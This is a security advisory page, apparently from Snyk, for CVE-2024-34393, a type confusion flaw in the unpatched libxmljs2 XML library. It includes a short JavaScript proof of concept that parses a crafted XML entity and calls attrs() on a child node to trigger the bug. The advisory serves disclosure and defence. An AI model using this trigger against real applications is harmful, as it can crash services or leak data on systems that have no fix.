Type Confusion Affecting libxmljs2 package, versions *


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Type Confusion vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-LIBXMLJS2-6808810
  • published5 May 2024
  • disclosed2 May 2024
  • creditUriya Yavnieli

Introduced: 2 May 2024

CVE-2024-34393  (opens in a new tab)
CWE-843  (opens in a new tab)

How to fix?

There is no fixed version for libxmljs2.

Overview

libxmljs2 is a libxml bindings for v8 javascript engine

Affected versions of this package are vulnerable to Type Confusion due to the improper handling of a specially crafted XML file. An attacker can cause a denial of service, data leak, infinite loop, or execute arbitrary code by invoking a function on the result of attrs() that was called on a parsed node.

PoC


const libxmljs2 = require('libxmljs2');

var d = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note
[
<!ENTITY writer `" + 'A'.repeat(0x1234) + `">
]>
<from>&writer;</from>
`;

t = libxmljs2.parseXml(d, {flags: [libxmljs2.XMLParseFlags.XML_PARSE_HUGE]})
from = t.get('//from')
c = from.childNodes()[0]
c2 = c.childNodes()[0]
c2_attrs = c2.attrs()

References

CVSS Scores

version 3.1